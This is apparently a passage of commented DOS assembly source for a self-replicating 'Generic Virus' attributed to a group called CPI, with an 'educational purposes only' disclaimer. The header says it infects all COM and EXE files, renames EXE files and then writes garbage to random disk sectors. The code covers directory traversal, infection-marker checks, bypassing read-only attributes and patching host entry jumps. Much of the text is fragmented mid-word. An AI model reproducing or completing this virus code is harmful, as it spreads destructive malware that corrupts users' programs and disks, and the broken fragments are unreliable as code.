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[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C*P*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CORRUPTED PROGRAMM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T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_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g) GENERIC VIRUS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GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADD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DE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE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NAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO B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IT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS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IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARB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THE DISK. HAVE PHUN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SO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION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MMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;|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FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CP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HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER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VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF IL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ILLICIT ACTIVITY THROUGH THE RELEAS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CPI INN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                       ;| Marker bytes that identif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                       ;| as infected/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   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X,00                 ;| Initialize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ES:[POINTER],AX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ES:[COUNTER],AX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ES:[DISKS B],AL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19                 ;| Get the selected drive (di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S:DRIVE,AL           ;| Get current path (sav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47                 ;| (di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H,0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L,1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L,AL                 ;| (in actu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SI,CS:OLD_PATH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 AH,0E                 ;| Find # of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L,0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AL,01                 ;| (Check if only on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Z HUPS3                 ;| (If not one drive, go the HUPS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06                 ;| Set pointer to SEARCH_ORDER +6 (one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PS3: MOV AH,0           ;| Execute this if there is more than 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BX,SEARCH_ORDER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BX,AX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BX,0001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S:POINTER,BX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C   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_DISK:                    ;| Carry is set if no more .CO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C NO_NAME_CHANGE        ;| found. From here, .EX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17                 ;| renamed to .COM (change .EXE to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 DX,CS:MASKE_EXE       ;| but will cause the error message "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 to large to fit in memory"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AL,0FF                ;| larger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Z NO_NAME_CHANGE        ;| (Check if an .EXE is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2CH                ;| If neither .COM or .EXE files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 then random sectors on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BX,CS:POINTER         ;| overwritten depending on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CS:[BX]            ;| in milliseconds. This is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BX,DX                 ;| complete "infection" of a storage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X,2                  ;| The virus can find nothing more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H,0                  ;| starts its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6                    ;| (write crap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NAME_CHANGE:                 ;| Check if the end of the search ord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BX,CS:POINTER         ;| has been reached. If so,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BX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S:POINTER,BX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L,CS:[BX]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DL,0FF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Z HUPS2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HOPS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PS2:                          ;| Get a new drive from the search ord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0E                 ;| and select it, beginning with the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 (chang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B                 ;| (chang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X,PATH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FIND_FIRST_FILE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FIRST_SUBDIR:              ;| Starting from the root,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17                 ;| first subdir. First, (change .exe to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X,CS:MASKE_EXE       ;| convert all .EXE files to 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B                 ;| (us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X,PATH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04E                ;| (search for first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X,00010001B          ;| (dir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X,MASKE_DIR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 CHANGE_DISK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BX,CS:COUNTER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BX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BX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Z  USE_NEXT_SUBDIR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NEXT_SUBDIR:               ;| Search for the next sub-dir,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4FH                ;| are found, the (search for next su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 drive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 CHANGE_DISK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BX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Z FIND_NEXT_SUBDIR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_NEXT_SUBDIR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2FH                ;| Select found directory. (get dta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BX,1CH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ES:[BX],W"\"          ;| (address of name in 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BX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DS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X,ES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S,AX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BX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B                 ;| (chang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DS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BX,CS:COUNTER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BX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S:COUNTER,BX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FIRST_FILE:                ;| Find first .COM file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04E                ;| If there are none, (Search for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X,00000001B          ;| search the next directory.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X,MASKE_COM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 FIND_FIRST_SUBDIR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CHECK_IF_ILL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NEXT_FILE:                 ;| If program is ill (infected) th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4FH                ;| for another. (search for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 FIND_FIRST_SUBDIR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IF_ILL:                   ;| Check if already infected by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D                 ;| (open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02                 ;|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9EH                ;| (address of name in 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BX,AX                 ;| (sav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FH                ;| (rea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H,BUFLEN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BUFFER             ;| (write in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EH                ;| (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BX,CS:[BUFFER]        ;| (look for three NO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MP BX,9090               ;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Z FIND_NEXT_FILE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43                 ;| This section by-passes (write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0                  ;| the MS/PC DOS Writ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9EH                ;| (address of name in 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43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01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X,11111110B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D                 ;| Open file for read/write (open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02                 ;| access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9EH                ;| (address of name in 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BX,AX                 ;| Read date entry of program and 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57                 ;| save for future use. (ge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0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CX                   ;| (sav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DX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CS:[CONTA W]       ;| The jump located at 0100h (save old j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S:[JMPBUF],DX        ;| the program will be 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CS:[BUFFER+1]      ;| (save new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CX,CONT-100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DX,CX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S:[CONTA],DX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57                 ;| The virus now copies itself to (writ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1                  ;|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P DX                    ;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CX                    ;| (restor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EH                ;| (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CS:[JMPBUF]        ;| Restore the old jump address.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S:[CONTA],DX         ;| at address "CONTA" the jump which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| start of the program.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:                           ;| preserve the executability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                       ;| program as much as possible. After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SE_OLD              ;| it still works with the jump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| virus. The jump address in the viru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| from the jump addres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  DB  0E9                   ;| Continue with the host program (make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 DW  0 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00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0E                 ;| Reactivate the selected (use ol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L,CS:DRIVE           ;| drive at the start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                    ;| reactivate the selected path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3B                 ;| of the program.(use ol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X,OLD_PATH-1         ;| (get old path and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 21                    ;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                       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_ORDER DB 0FF,1,0,2,3,0FF,00,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   DW   0000          ;| (pointer f. search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     DW   0000          ;| (counter f. nth. sear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      DB   0             ;| (number of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_COM    DB "*.COM",00      ;| (search for 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_DIR    DB "*",00          ;| (search for di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_EXE    DB 0FF,0,0,0,0,0,001111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 0,"????????EXE"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 0,"????????COM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_ALL    DB 0FF,0,0,0,0,0,001111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 0,"???????????"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 0,"????????COM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EQU 0E00                 ;| (a safe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LEN EQU 208H                 ;| Length of virus. Modify this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| if you modify this source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| for this may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BUF EQU BUFFER+BUFLEN        ;| (a safe place for j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DB "\",0                  ;| (first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B 0                      ;| (actu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SLASH DB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PATH DB 32 DUP (?)          ;| (old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